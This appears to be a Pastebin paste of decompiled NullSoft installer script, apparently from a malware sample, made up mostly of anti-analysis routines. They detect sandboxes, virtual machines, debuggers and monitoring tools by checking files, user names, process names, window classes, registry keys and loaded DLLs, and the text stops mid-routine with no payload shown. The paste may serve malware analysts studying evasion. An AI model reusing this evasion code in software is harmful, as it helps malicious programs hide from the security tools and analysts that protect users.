API tools faq
paste
Advertisement
siri_urz

Untitled

siri_urz
Apr 4th, 2018
738
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
NullSoft Installer 28.66 KB | None | 0 0
raw download clone embed print report
  1. Push €€
  2. Exch
  3. Pop $0
  4. Push €
  5. Push ‚€
  6. Push ƒ€
  7. Push „€
  8. Push …€
  9. Push †€
  10. Push ‡€
  11. StrCpy $1 "€€,"
  12. StrCpy $2 "65536"
  13. Push 0
  14. Call 1400
  15. File š€\System.dll
  16. SetFlag 13 0
  17. Push ‚€
  18. RegisterDLL š€\System.dll Alloc 0
  19. Pop $3
  20. Call 1400
  21. File š€\System.dll
  22. SetFlag 13 0
  23. Push ntdll::ZwQuerySystemInformation(i 5, i ƒ€, i ‚€, i 0) i .r0
  24. RegisterDLL š€\System.dll Call 0
  25. StrCmp  "€€" "0" 36 0 0
  26. IntCmp 74 207 0 35 35 0
  27. Call 1400
  28. File š€\System.dll
  29. SetFlag 13 0
  30. Push ƒ€
  31. RegisterDLL š€\System.dll Free 0
  32. IntOp 2 82 111 0
  33. Goto 14
  34. Goto 36
  35. Goto 223
  36. StrCpy $7 "ƒ€"
  37. Call 1400
  38. File š€\System.dll
  39. SetFlag 13 0
  40. Push *ƒ€(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,.r2,,.r6,)
  41. RegisterDLL š€\System.dll Call 0
  42. Call 1400
  43. File š€\System.dll
  44. SetFlag 13 0
  45. Push kernel32::WideCharToMultiByte(i 0, i 0, i r2, i -1, t .r5, i 1024, i 0, i 0) i .r0
  46. RegisterDLL š€\System.dll Call 0
  47. Push €
  48. Push ,
  49. Push /…€
  50. Call 52
  51. Goto 215
  52. Push €
  53. Exch
  54. Pop $1
  55. Exch
  56. Push €€
  57. Exch
  58. Pop $0
  59. Exch
  60. Exch
  61. Push Š€
  62. Exch
  63. Pop $R0
  64. Exch
  65. Push ‚€
  66. Push ƒ€
  67. Push „€
  68. Push …€
  69. Push †€
  70. Push ‡€
  71. Push ˆ€
  72. Push ‰€
  73. Push ‹€
  74. Push Œ€
  75. SetFlag 2 117
  76. StrCpy $9 ""
  77. StrCpy $2 "€" 1
  78. StrCpy $1 "€" "" 1
  79. StrCmp  "‚€" "E" 0 82 0
  80. StrCpy $9 "E"
  81. Goto 77
  82. StrCpy $3 ""
  83. StrCmp  "‚€" "+" 89 0 0
  84. StrCmp  "‚€" "-" 89 0 0
  85. StrCmp  "‚€" "/" 102 0 0
  86. StrCmp  "‚€" "#" 102 0 0
  87. StrCmp  "‚€" "*" 102 0 0
  88. Goto 191
  89. StrCpy $4 "€" 1 -1
  90. StrCmp  "„€" "*" 94 0 0
  91. StrCmp  "„€" "}" 94 0 0
  92. StrCmp  "„€" "{" 94 0 0
  93. Goto 97
  94. StrCpy $1 "€" -1
  95. StrCpy $3 "„€ƒ€"
  96. Goto 89
  97. StrCmp  "ƒ€" "*" 191 0 0
  98. StrCmp  "ƒ€" "**" 191 0 0
  99. StrCmp  "ƒ€" "}{" 191 0 0
  100. IntOp 1 78 117 0
  101. StrCmp  "€" "0" 193 0 0
  102. StrCmp  "Š€" "" 195 0 0
  103. StrCpy $4 "0"
  104. StrCpy $5 "0"
  105. StrCpy $6 "0"
  106. Assign 7 74
  107. Goto 109
  108. IntOp 6 98 418 0
  109. StrCpy $8 "Š€" ‡€ †€
  110. StrCmp  "ˆ€…€" "0" 195 0 0
  111. Assign 12 402
  112. IntCmp 414 117 114 0 0 0
  113. StrCmp  "ˆ€" "€€" 118 108 0
  114. StrCmp  "ƒ€" "{" 133 0 0
  115. StrCmp  "ƒ€" "}" 133 0 0
  116. StrCmp  "‚€" "*" 133 0 0
  117. StrCmp  "…€" "†€" 133 122 0
  118. StrCmp  "ƒ€" "{" 122 0 0
  119. StrCmp  "ƒ€" "}" 122 0 0
  120. StrCmp  "‚€" "*" 122 0 0
  121. StrCmp  "…€" "†€" 130 0 0
  122. IntOp 4 90 418 0
  123. StrCmp  "‚€„€" "+€" 144 0 0
  124. StrCmp  "‚€" "/" 0 130 0
  125. IntOp 8 98 94 1
  126. StrCpy $8 "Š€" ˆ€ …€
  127. StrCmp  "€" "ˆ€" 0 130 0
  128. StrCpy $R1 "„€"
  129. Goto 198
  130. IntOp 6 98 102 0
  131. StrCpy $5 "†€"
  132. Goto 109
  133. StrCmp  "‚€" "-" 0 138 0
  134. StrCpy $2 "+"
  135. IntOp 1 90 78 1
  136. IntOp 1 78 418 0
  137. IntCmp 78 117 193 193 102 0
  138. StrCmp  "‚€" "#" 0 141 0
  139. StrCpy $R1 "„€"
  140. Goto 198
  141. StrCmp  "‚€" "*" 0 193 0
  142. StrCpy $R1 "„€"
  143. Goto 198
  144. StrCmp  "ƒ€" "" 0 148 0
  145. IntOp 6 98 94 1
  146. StrCpy $R1 "Š€" †€ …€
  147. Goto 198
  148. StrCmp  "ƒ€" "{" 0 151 0
  149. StrCpy $R1 "Š€" †€
  150. Goto 198
  151. StrCmp  "ƒ€" "}" 0 155 0
  152. IntOp 6 98 102 0
  153. StrCpy $R1 "Š€" "" †€
  154. Goto 198
  155. StrCmp  "ƒ€" "{*" 157 0 0
  156. StrCmp  "ƒ€" "*{" 0 159 0
  157. StrCpy $R1 "Š€" †€
  158. Goto 198
  159. StrCmp  "ƒ€" "*}" 161 0 0
  160. StrCmp  "ƒ€" "}*" 0 163 0
  161. StrCpy $R1 "Š€" "" …€
  162. Goto 198
  163. StrCmp  "ƒ€" "}}" 0 166 0
  164. StrCpy $R1 "Š€" "" †€
  165. Goto 198
  166. StrCmp  "ƒ€" "{{" 0 169 0
  167. StrCpy $R1 "Š€" …€
  168. Goto 198
  169. StrCmp  "ƒ€" "{}" 0 191 0
  170. Assign 3 398
  171. StrCmp  "ƒ€" "†€" 0 174 0
  172. StrCpy $0 ""
  173. Goto 175
  174. IntOp 6 98 102 0
  175. StrCpy $8 "Š€" "" †€
  176. StrCmp  "„€ˆ€" "1" 182 0 0
  177. StrCmp  "„€" "1" 179 184 0
  178. IntOp 6 98 102 0
  179. StrCpy $3 "Š€" ‡€ †€
  180. StrCmp  "ƒ€" "" 182 0 0
  181. StrCmp  "ƒ€" "€€" 178 184 0
  182. StrCpy $R1 ""
  183. Goto 198
  184. StrCmp  "…€" "0" 0 187 0
  185. StrCpy $0 ""
  186. Goto 188
  187. IntOp 5 94 102 1
  188. StrCpy $3 "Š€" …€
  189. StrCpy $R1 "ƒ€€€ˆ€"
  190. Goto 198
  191. StrCpy $R1 "3"
  192. Goto 196
  193. StrCpy $R1 "2"
  194. Goto 196
  195. StrCpy $R1 "1"
  196. StrCmp  "‰€" "E" 0 199 0
  197. SetFlag 2 418
  198. StrCpy $R0 "‹€"
  199. Pop $R2
  200. Pop $R1
  201. Pop $9
  202. Pop $8
  203. Pop $7
  204. Pop $6
  205. Pop $5
  206. Pop $4
  207. Pop $3
  208. Pop $2
  209. Pop $1
  210. Pop $0
  211. Push Š€
  212. Exch
  213. Pop $R0
  214. Return
  215. Pop $0
  216. IntCmp 74 117 220 0 0 0
  217. Pop $0
  218. Push †€
  219. Goto 223
  220. StrCmp  "„€" "0" 223 0 0
  221. IntOp 3 86 90 0
  222. Goto 37
  223. Call 1400
  224. File š€\System.dll
  225. SetFlag 13 0
  226. Push ‡€
  227. RegisterDLL š€\System.dll Free 0
  228. Pop $0
  229. Pop $7
  230. Pop $6
  231. Pop $5
  232. Pop $4
  233. Pop $3
  234. Pop $2
  235. Pop $1
  236. Push €€
  237. Exch
  238. Pop $0
  239. Return
  240. Push €€
  241. Exch
  242. Pop $0
  243. Push €
  244. Push ‚€
  245. Push ƒ€
  246. Push „€
  247. Push …€
  248. Push †€
  249. Push ‡€
  250. StrCpy $1 "€€"
  251. StrCpy $2 "65536"
  252. Push 0
  253. Call 1400
  254. File š€\System.dll
  255. SetFlag 13 0
  256. Push ‚€
  257. RegisterDLL š€\System.dll Alloc 0
  258. Pop $3
  259. Call 1400
  260. File š€\System.dll
  261. SetFlag 13 0
  262. Push ntdll::ZwQuerySystemInformation(i 5, i ƒ€, i ‚€, i 0) i .r0
  263. RegisterDLL š€\System.dll Call 0
  264. StrCmp  "€€" "0" 275 0 0
  265. IntCmp 74 207 0 274 274 0
  266. Call 1400
  267. File š€\System.dll
  268. SetFlag 13 0
  269. Push ƒ€
  270. RegisterDLL š€\System.dll Free 0
  271. IntOp 2 82 111 0
  272. Goto 253
  273. Goto 275
  274. Goto 305
  275. StrCpy $7 "ƒ€"
  276. Call 1400
  277. File š€\System.dll
  278. SetFlag 13 0
  279. Push *ƒ€(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)
  280. RegisterDLL š€\System.dll Call 0
  281. IntCmp 78 82 0 302 302 0
  282. StrCpy $1 "†€"
  283. StrCpy $3 "‡€"
  284. Call 1400
  285. File š€\System.dll
  286. SetFlag 13 0
  287. Push *ƒ€(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,.r2,,.r6,)
  288. RegisterDLL š€\System.dll Call 0
  289. IntCmp 78 98 0 298 298 0
  290. Call 1400
  291. File š€\System.dll
  292. SetFlag 13 0
  293. Push kernel32::WideCharToMultiByte(i 0, i 0, i r2, i -1, t .r5, i 1024, i 0, i 0) i .r0
  294. RegisterDLL š€\System.dll Call 0
  295. Pop $0
  296. Push …€
  297. Goto 305
  298. StrCmp  "„€" "0" 301 0 0
  299. IntOp 3 86 90 0
  300. Goto 284
  301. Goto 305
  302. StrCmp  "„€" "0" 305 0 0
  303. IntOp 3 86 90 0
  304. Goto 276
  305. Call 1400
  306. File š€\System.dll
  307. SetFlag 13 0
  308. Push ‡€
  309. RegisterDLL š€\System.dll Free 0
  310. Pop $0
  311. Pop $7
  312. Pop $6
  313. Pop $5
  314. Pop $4
  315. Pop $3
  316. Pop $2
  317. Pop $1
  318. Push €€
  319. Exch
  320. Pop $0
  321. Return
  322. Push Š€
  323. Exch
  324. Pop $R0
  325. Exch
  326. Push ‹€
  327. Exch
  328. Pop $R1
  329. Push Œ€
  330. Push €
  331. Call 1400
  332. File š€\System.dll
  333. SetFlag 13 0
  334. Push ntdll::strstr(t R1, t R0)i.R0 ?c
  335. RegisterDLL š€\System.dll Call 0
  336. Pop $R3
  337. Pop $R2
  338. Pop $R1
  339. Push Š€
  340. Exch
  341. Pop $R0
  342. Return
  343. Push ‹€
  344. Call 1400
  345. File š€\System.dll
  346. SetFlag 13 0
  347. Push kernel32::GetFileAttributes(t 'c:\cwsandbox\cwsandbox.ini')i .R0
  348. RegisterDLL š€\System.dll Call 0
  349. IntCmp 398 702 351 0 0 0
  350. Goto 366
  351. Call 1400
  352. File š€\System.dll
  353. SetFlag 13 0
  354. Push kernel32::GetFileAttributes(t 'c:\test\vmversion.txt')i .R0
  355. RegisterDLL š€\System.dll Call 0
  356. IntCmp 398 702 358 0 0 0
  357. Goto 366
  358. Call 1400
  359. File š€\System.dll
  360. SetFlag 13 0
  361. Push kernel32::GetFileAttributes(t 'c:\bin\AHookMonitor.dll')i .R0
  362. RegisterDLL š€\System.dll Call 0
  363. IntCmp 398 702 365 0 0 0
  364. Goto 366
  365. Goto 368
  366. StrCpy $R0 "TRUE"
  367. Goto 369
  368. StrCpy $R0 "FALSE"
  369. Pop $R1
  370. Return
  371. Push ‹€
  372. Push Œ€
  373. Push €
  374. Call 1400
  375. File š€\System.dll
  376. SetFlag 13 0
  377. Push advapi32::GetUserName(t .R0, *i 1024 R1) i.R2
  378. RegisterDLL š€\System.dll Call 0
  379. Call 1400
  380. File š€\System.dll
  381. SetFlag 13 0
  382. Push User32::CharLower(t R0 R0) i
  383. RegisterDLL š€\System.dll Call 0
  384. StrCmp  "Š€" "sandbox" 0 386 0
  385. Goto 399
  386. StrCmp  "Š€" "vmware" 0 388 0
  387. Goto 399
  388. StrCmp  "Š€" "honey" 0 390 0
  389. Goto 399
  390. StrCmp  "Š€" "nepenthes" 0 392 0
  391. Goto 399
  392. StrCmp  "Š€" "maltest" 0 394 0
  393. Goto 399
  394. StrCmp  "Š€" "malware" 0 396 0
  395. Goto 399
  396. StrCmp  "Š€" "currentuser" 0 398 0
  397. Goto 399
  398. Goto 401
  399. StrCpy $R0 "TRUE"
  400. Goto 402
  401. StrCpy $R0 "FALSE"
  402. Pop $R3
  403. Pop $R2
  404. Pop $R1
  405. Return
  406. Push ‹€
  407. Call 1400
  408. File š€\System.dll
  409. SetFlag 13 0
  410. Push kernel32::IsDebuggerPresent()i.R0
  411. RegisterDLL š€\System.dll Call 0
  412. IntCmp 398 117 414 0 0 0
  413. Goto 436
  414. Call 1400
  415. File š€\System.dll
  416. SetFlag 13 0
  417. Push kernel32::CloseHandle(i 0)i.R0
  418. RegisterDLL š€\System.dll Call 0
  419. IntCmp 398 117 421 0 0 0
  420. Goto 436
  421. Call 1400
  422. File š€\System.dll
  423. SetFlag 13 0
  424. Push kernel32::CloseHandle(i 0xDEADC0DE)i.R0
  425. RegisterDLL š€\System.dll Call 0
  426. IntCmp 398 117 428 0 0 0
  427. Goto 436
  428. Call 1400
  429. File š€\System.dll
  430. SetFlag 13 0
  431. Push kernel32::CloseHandle(i 0xFEFEDEAF)i.R0
  432. RegisterDLL š€\System.dll Call 0
  433. IntCmp 398 117 435 0 0 0
  434. Goto 436
  435. Goto 438
  436. StrCpy $R0 "TRUE"
  437. Goto 439
  438. StrCpy $R0 "FALSE"
  439. Pop $R1
  440. Return
  441. Push ‹€
  442. Call 1400
  443. File š€\System.dll
  444. SetFlag 13 0
  445. Push kernel32::GetCurrentProcessId()i.R0
  446. RegisterDLL š€\System.dll Call 0
  447. IntCmp 398 117 486 0 0 0
  448. Push Š€
  449. Call 240
  450. Pop $R1
  451. Call 1400
  452. File š€\System.dll
  453. SetFlag 13 0
  454. Push User32::CharLower(t R1 R1)i
  455. RegisterDLL š€\System.dll Call 0
  456. Push ‹€
  457. Push perl
  458. Call 322
  459. Pop $R0
  460. IntCmp 398 117 462 0 0 0
  461. Goto 535
  462. Push ‹€
  463. Push python
  464. Call 322
  465. Pop $R0
  466. IntCmp 398 117 468 0 0 0
  467. Goto 535
  468. Push ‹€
  469. Push autoit
  470. Call 322
  471. Pop $R0
  472. IntCmp 398 117 474 0 0 0
  473. Goto 535
  474. Push ‹€
  475. Push ollydbg
  476. Call 322
  477. Pop $R0
  478. IntCmp 398 117 480 0 0 0
  479. Goto 535
  480. Push ‹€
  481. Push immunitydebugger
  482. Call 322
  483. Pop $R0
  484. IntCmp 398 117 486 0 0 0
  485. Goto 535
  486. StrCpy $R1 ""
  487. StrCpy $R1 "‹€python.exe"
  488. StrCpy $R1 "‹€,perl.exe"
  489. StrCpy $R1 "‹€,xenservice.exe"
  490. StrCpy $R1 "‹€,vmtoolsd.exe"
  491. StrCpy $R1 "‹€,ollydbg.exe"
  492. StrCpy $R1 "‹€,immunitydebugger.exe"
  493. StrCpy $R1 "‹€,windbg.exe"
  494. StrCpy $R1 "‹€,syserapp.exe"
  495. StrCpy $R1 "‹€,x96_dbg.exe"
  496. StrCpy $R1 "‹€,x32_dbg.exe"
  497. StrCpy $R1 "‹€,x64_dbg.exe"
  498. StrCpy $R1 "‹€,prl_cc.exe"
  499. StrCpy $R1 "‹€,prl_tools.exe"
  500. StrCpy $R1 "‹€,vboxservice.exe"
  501. StrCpy $R1 "‹€,vmusrvc.exe"
  502. StrCpy $R1 "‹€,vmsrvc.exe"
  503. StrCpy $R1 "‹€,sharedintapp.exe"
  504. StrCpy $R1 "‹€,procexp.exe"
  505. StrCpy $R1 "‹€,vmware.exe"
  506. StrCpy $R1 "‹€,joeboxserver.exe"
  507. StrCpy $R1 "‹€,joeboxcontrol.exe"
  508. StrCpy $R1 "‹€,sniff_hit.exe"
  509. StrCpy $R1 "‹€,sysanalyzer.exe"
  510. StrCpy $R1 "‹€,regmon.exe"
  511. StrCpy $R1 "‹€,autoruns.exe"
  512. StrCpy $R1 "‹€,sandboxreboot.exe"
  513. StrCpy $R1 "‹€,sandboxreboot-5min.exe"
  514. StrCpy $R1 "‹€,systracersrv.exe"
  515. StrCpy $R1 "‹€,systracer.exe"
  516. StrCpy $R1 "‹€,tcpdump.exe"
  517. StrCpy $R1 "‹€,windump.exe"
  518. StrCpy $R1 "‹€,windbg.exe"
  519. StrCpy $R1 "‹€,apis32.exe"
  520. StrCpy $R1 "‹€,sbiesvc.exe"
  521. StrCpy $R1 "‹€,sandboxierpcss.exe"
  522. StrCpy $R1 "‹€,dumpcap.exe"
  523. StrCpy $R1 "‹€,zxsniffer.exe"
  524. StrCpy $R1 "‹€,wspass.exe"
  525. StrCpy $R1 "‹€,sandbox_svc.exe"
  526. StrCpy $R1 "‹€,a2service.exe"
  527. StrCpy $R1 "‹€,bullguard.exe"
  528. StrCpy $R1 "‹€,frwl_svc.exe"
  529. Push ‹€
  530. Call 1
  531. Pop $R0
  532. IntCmp 398 117 534 0 0 0
  533. Goto 535
  534. Goto 537
  535. StrCpy $R0 "TRUE"
  536. Goto 538
  537. StrCpy $R0 "FALSE"
  538. Pop $R1
  539. Return
  540. Push €
  541. Push ‚€
  542. Push ƒ€
  543. Push „€
  544. IntOp 4 117 117 0
  545. Call 1400
  546. File š€\System.dll
  547. SetFlag 13 0
  548. Push (p.r1, p) iss
  549. RegisterDLL š€\System.dll Get 0
  550. Pop $R0
  551. Call 1400
  552. File š€\System.dll
  553. SetFlag 13 0
  554. Push user32::EnumWindows(k R0, p) i.s
  555. RegisterDLL š€\System.dll Call 0
  556. Pop $0
  557. StrCmp  "€€" "callback1" 0 627 0
  558. Call 1400
  559. File š€\System.dll
  560. SetFlag 13 0
  561. Push user32::GetWindowText(p r1, t.r2, i1024)
  562. RegisterDLL š€\System.dll Call 0
  563. Call 1400
  564. File š€\System.dll
  565. SetFlag 13 0
  566. Push user32::GetClassName(p r1, t.r3, i1024)
  567. RegisterDLL š€\System.dll Call 0
  568. IntCmp 90 117 0 620 620 0
  569. StrCmp  "ƒ€" "PROCEXPL" 0 571 0
  570. IntOp 4 90 418 0
  571. StrCmp  "ƒ€" "PROCMON_WINDOW_CLASS" 0 573 0
  572. IntOp 4 90 418 0
  573. StrCmp  "ƒ€" "VBoxTrayToolWndClass" 0 575 0
  574. IntOp 4 90 418 0
  575. StrCmp  "ƒ€" "VMSwitchUserControlClass" 0 577 0
  576. IntOp 4 90 418 0
  577. StrCmp  "ƒ€" "ProcessLasso_Notification_Class" 0 579 0
  578. IntOp 4 90 418 0
  579. StrCmp  "ƒ€" "SmartSniff" 0 581 0
  580. IntOp 4 90 418 0
  581. StrCmp  "ƒ€" "ProcessHacker" 0 583 0
  582. IntOp 4 90 418 0
  583. StrCmp  "ƒ€" "CPInterceptor" 0 585 0
  584. IntOp 4 90 418 0
  585. StrCmp  "ƒ€" "{0843FD01-1D28-44a3-B11D-E3A93A85EA96}" 0 587 0
  586. IntOp 4 90 418 0
  587. StrCmp  "ƒ€" "SysAnalyzer" 0 589 0
  588. IntOp 4 90 418 0
  589. StrCmp  "ƒ€" "CPInterceptor" 0 591 0
  590. IntOp 4 90 418 0
  591. StrCmp  "ƒ€" "VMSwitchUserControlClass" 0 593 0
  592. IntOp 4 90 418 0
  593. StrCmp  "ƒ€" "ProcessHacker" 0 595 0
  594. IntOp 4 90 418 0
  595. StrCmp  "‚€" "0" 620 0 0
  596. Push ‚€
  597. Push - main thread
  598. Call 322
  599. Pop $0
  600. IntCmp 74 117 602 0 0 0
  601. IntOp 4 90 418 0
  602. Push ‚€
  603. Push API Monitor
  604. Call 322
  605. Pop $0
  606. IntCmp 74 117 608 0 0 0
  607. IntOp 4 90 418 0
  608. Push ‚€
  609. Push Blue Project Software SysTracer
  610. Call 322
  611. Pop $0
  612. IntCmp 74 117 614 0 0 0
  613. IntOp 4 90 418 0
  614. Push ‚€
  615. Push sysinternals
  616. Call 322
  617. Pop $0
  618. IntCmp 74 117 620 0 0 0
  619. IntOp 4 90 418 0
  620. Push 1
  621. Call 1400
  622. File š€\System.dll
  623. SetFlag 13 0
  624. Push Š€
  625. RegisterDLL š€\System.dll Call 0
  626. Goto 556
  627. Call 1400
  628. File š€\System.dll
  629. SetFlag 13 0
  630. Push Š€
  631. RegisterDLL š€\System.dll Free 0
  632. IntCmp 90 117 635 0 0 0
  633. StrCpy $R0 "TRUE"
  634. Goto 636
  635. StrCpy $R0 "FALSE"
  636. Pop $4
  637. Pop $3
  638. Pop $2
  639. Pop $1
  640. Return
  641. Push ‹€
  642. Call 1400
  643. File š€\System.dll
  644. SetFlag 13 0
  645. Push kernel32::GetModuleFileName(i 0, t .R1, i 1024)i.R0
  646. RegisterDLL š€\System.dll Call 0
  647. IntCmp 398 117 0 649 649 0
  648. Goto 728
  649. Call 1400
  650. File š€\System.dll
  651. SetFlag 13 0
  652. Push User32::CharLower(t R1 R1)i
  653. RegisterDLL š€\System.dll Call 0
  654. Call 1400
  655. File š€\System.dll
  656. SetFlag 13 0
  657. Push ntdll::strstr(t R1, t 'c:\t.exe')i.R0 ?c
  658. RegisterDLL š€\System.dll Call 0
  659. IntCmp 398 117 661 0 0 0
  660. Goto 725
  661. Call 1400
  662. File š€\System.dll
  663. SetFlag 13 0
  664. Push ntdll::strstr(t R1, t 'c:\myapp')i.R0 ?c
  665. RegisterDLL š€\System.dll Call 0
  666. IntCmp 398 117 668 0 0 0
  667. Goto 725
  668. Call 1400
  669. File š€\System.dll
  670. SetFlag 13 0
  671. Push ntdll::strstr(t R1, t 'c:\self')i.R0 ?c
  672. RegisterDLL š€\System.dll Call 0
  673. IntCmp 398 117 675 0 0 0
  674. Goto 725
  675. Call 1400
  676. File š€\System.dll
  677. SetFlag 13 0
  678. Push ntdll::strstr(t R1, t 'c:\file')i.R0 ?c
  679. RegisterDLL š€\System.dll Call 0
  680. IntCmp 398 117 682 0 0 0
  681. Goto 725
  682. Call 1400
  683. File š€\System.dll
  684. SetFlag 13 0
  685. Push ntdll::strstr(t R1, t 'c:\analyzer\')i.R0 ?c
  686. RegisterDLL š€\System.dll Call 0
  687. IntCmp 398 117 689 0 0 0
  688. Goto 725
  689. Call 1400
  690. File š€\System.dll
  691. SetFlag 13 0
  692. Push ntdll::strstr(t R1, t 'c:\test')i.R0 ?c
  693. RegisterDLL š€\System.dll Call 0
  694. IntCmp 398 117 696 0 0 0
  695. Goto 725
  696. Call 1400
  697. File š€\System.dll
  698. SetFlag 13 0
  699. Push ntdll::strstr(t R1, t 'c:\ohcbulyb.exe')i.R0 ?c
  700. RegisterDLL š€\System.dll Call 0
  701. IntCmp 398 117 703 0 0 0
  702. Goto 725
  703. Call 1400
  704. File š€\System.dll
  705. SetFlag 13 0
  706. Push ntdll::strstr(t R1, t 'sample')i.R0 ?c
  707. RegisterDLL š€\System.dll Call 0
  708. IntCmp 398 117 710 0 0 0
  709. Goto 725
  710. Call 1400
  711. File š€\System.dll
  712. SetFlag 13 0
  713. Push ntdll::strstr(t R1, t 'target.exe')i.R0 ?c
  714. RegisterDLL š€\System.dll Call 0
  715. IntCmp 398 117 717 0 0 0
  716. Goto 725
  717. Call 1400
  718. File š€\System.dll
  719. SetFlag 13 0
  720. Push ntdll::strstr(t R1, t 'insidetm')i.R0 ?c
  721. RegisterDLL š€\System.dll Call 0
  722. IntCmp 398 117 724 0 0 0
  723. Goto 725
  724. Goto 727
  725. StrCpy $R0 "TRUE"
  726. Goto 728
  727. StrCpy $R0 "FALSE"
  728. Pop $R1
  729. Return
  730. Push ‹€
  731. Call 1400
  732. File š€\System.dll
  733. SetFlag 13 0
  734. Push kernel32::GetCurrentProcess()p.s
  735. RegisterDLL š€\System.dll Call 0
  736. Call 1400
  737. File š€\System.dll
  738. SetFlag 13 0
  739. Push kernel32::IsWow64Process(ps,*i0s)
  740. RegisterDLL š€\System.dll Call 0
  741. Pop $[32]
  742. StrCmp  " €" "0" 744 0 0
  743. SetFlag 12 2914
  744. SetFlag 2 117
  745. ReadRegStr 11 2147483650 2918 2980 0
  746. IfFlag 0 748 2 0
  747. StrCpy $R1 "0"
  748. StrCmp  "‹€" "0" 750 0 0
  749. Goto 843
  750. SetFlag 2 117
  751. ReadRegStr 11 2147483650 2992 3025 0
  752. IfFlag 0 754 2 0
  753. StrCpy $R1 "0"
  754. StrCmp  "‹€" "0" 774 0 0
  755. Call 1400
  756. File š€\System.dll
  757. SetFlag 13 0
  758. Push User32::CharLower(t R1 R1)i
  759. RegisterDLL š€\System.dll Call 0
  760. Call 1400
  761. File š€\System.dll
  762. SetFlag 13 0
  763. Push ntdll::strstr(t R1, t 'vmware')i.R0 ?c
  764. RegisterDLL š€\System.dll Call 0
  765. IntCmp 398 117 767 0 0 0
  766. Goto 843
  767. Call 1400
  768. File š€\System.dll
  769. SetFlag 13 0
  770. Push ntdll::strstr(t R1, t 'vbox')i.R0 ?c
  771. RegisterDLL š€\System.dll Call 0
  772. IntCmp 398 117 774 0 0 0
  773. Goto 843
  774. SetFlag 2 117
  775. ReadRegStr 11 2147483650 3119 3198 0
  776. IfFlag 0 778 2 0
  777. StrCpy $R1 "0"
  778. StrCmp  "‹€" "0" 805 0 0
  779. Call 1400
  780. File š€\System.dll
  781. SetFlag 13 0
  782. Push User32::CharLower(t R1 R1)i
  783. RegisterDLL š€\System.dll Call 0
  784. Call 1400
  785. File š€\System.dll
  786. SetFlag 13 0
  787. Push ntdll::strstr(t R1, t 'vmware')i.R0 ?c
  788. RegisterDLL š€\System.dll Call 0
  789. IntCmp 398 117 791 0 0 0
  790. Goto 843
  791. Call 1400
  792. File š€\System.dll
  793. SetFlag 13 0
  794. Push ntdll::strstr(t R1, t 'vbox')i.R0 ?c
  795. RegisterDLL š€\System.dll Call 0
  796. IntCmp 398 117 798 0 0 0
  797. Goto 843
  798. Call 1400
  799. File š€\System.dll
  800. SetFlag 13 0
  801. Push ntdll::strstr(t R1, t 'virtual')i.R0 ?c
  802. RegisterDLL š€\System.dll Call 0
  803. IntCmp 398 117 805 0 0 0
  804. Goto 843
  805. SetFlag 2 117
  806. ReadRegStr 11 2147483650 3257 117 0
  807. IfFlag 0 809 2 0
  808. StrCpy $R1 "0"
  809. StrCmp  "‹€" "0" 836 0 0
  810. Call 1400
  811. File š€\System.dll
  812. SetFlag 13 0
  813. Push User32::CharLower(t R1 R1)i
  814. RegisterDLL š€\System.dll Call 0
  815. Call 1400
  816. File š€\System.dll
  817. SetFlag 13 0
  818. Push ntdll::strstr(t R1, t 'vmware')i.R0 ?c
  819. RegisterDLL š€\System.dll Call 0
  820. IntCmp 398 117 822 0 0 0
  821. Goto 843
  822. Call 1400
  823. File š€\System.dll
  824. SetFlag 13 0
  825. Push ntdll::strstr(t R1, t 'vbox')i.R0 ?c
  826. RegisterDLL š€\System.dll Call 0
  827. IntCmp 398 117 829 0 0 0
  828. Goto 843
  829. Call 1400
  830. File š€\System.dll
  831. SetFlag 13 0
  832. Push ntdll::strstr(t R1, t 'virtual')i.R0 ?c
  833. RegisterDLL š€\System.dll Call 0
  834. IntCmp 398 117 836 0 0 0
  835. Goto 843
  836. SetFlag 2 117
  837. ReadRegStr 11 2147483650 3297 3332 0
  838. IfFlag 0 840 2 0
  839. StrCpy $R1 "0"
  840. StrCmp  "‹€" "0" 842 0 0
  841. Goto 843
  842. Goto 845
  843. StrCpy $R0 "TRUE"
  844. Goto 846
  845. StrCpy $R0 "FALSE"
  846. SetFlag 12 117
  847. Pop $R1
  848. Return
  849. Push ‹€
  850. Call 1400
  851. File š€\System.dll
  852. SetFlag 13 0
  853. Push kernel32::GetModuleHandle(t 'dbghelp.dll') i.R0
  854. RegisterDLL š€\System.dll Call 0
  855. IntCmp 398 117 857 0 0 0
  856. Goto 921
  857. Call 1400
  858. File š€\System.dll
  859. SetFlag 13 0
  860. Push kernel32::GetModuleHandle(t 'pstorec.dll') i.R0
  861. RegisterDLL š€\System.dll Call 0
  862. IntCmp 398 117 864 0 0 0
  863. Goto 921
  864. Call 1400
  865. File š€\System.dll
  866. SetFlag 13 0
  867. Push kernel32::GetModuleHandle(t 'vmcheck.dll') i.R0
  868. RegisterDLL š€\System.dll Call 0
  869. IntCmp 398 117 871 0 0 0
  870. Goto 921
  871. Call 1400
  872. File š€\System.dll
  873. SetFlag 13 0
  874. Push kernel32::GetModuleHandle(t 'api_log.dll') i.R0
  875. RegisterDLL š€\System.dll Call 0
  876. IntCmp 398 117 878 0 0 0
  877. Goto 921
  878. Call 1400
  879. File š€\System.dll
  880. SetFlag 13 0
  881. Push kernel32::GetModuleHandle(t 'wpespy.dll') i.R0
  882. RegisterDLL š€\System.dll Call 0
  883. IntCmp 398 117 885 0 0 0
  884. Goto 921
  885. Call 1400
  886. File š€\System.dll
  887. SetFlag 13 0
  888. Push kernel32::GetModuleHandle(t 'SbieDll.dll') i.R0
  889. RegisterDLL š€\System.dll Call 0
  890. IntCmp 398 117 892 0 0 0
  891. Goto 921
  892. Call 1400
  893. File š€\System.dll
  894. SetFlag 13 0
  895. Push kernel32::GetModuleHandle(t 'dir_watch.dll') i.R0
  896. RegisterDLL š€\System.dll Call 0
  897. IntCmp 398 117 899 0 0 0
  898. Goto 921
  899. Call 1400
  900. File š€\System.dll
  901. SetFlag 13 0
  902. Push kernel32::GetModuleHandle(t 'cmdvrt32.dll') i.R0
  903. RegisterDLL š€\System.dll Call 0
  904. IntCmp 398 117 906 0 0 0
  905. Goto 921
  906. Call 1400
  907. File š€\System.dll
  908. SetFlag 13 0
  909. Push kernel32::LoadLibrary(t 'VBoxHook.dll') i.R0
  910. RegisterDLL š€\System.dll Call 0
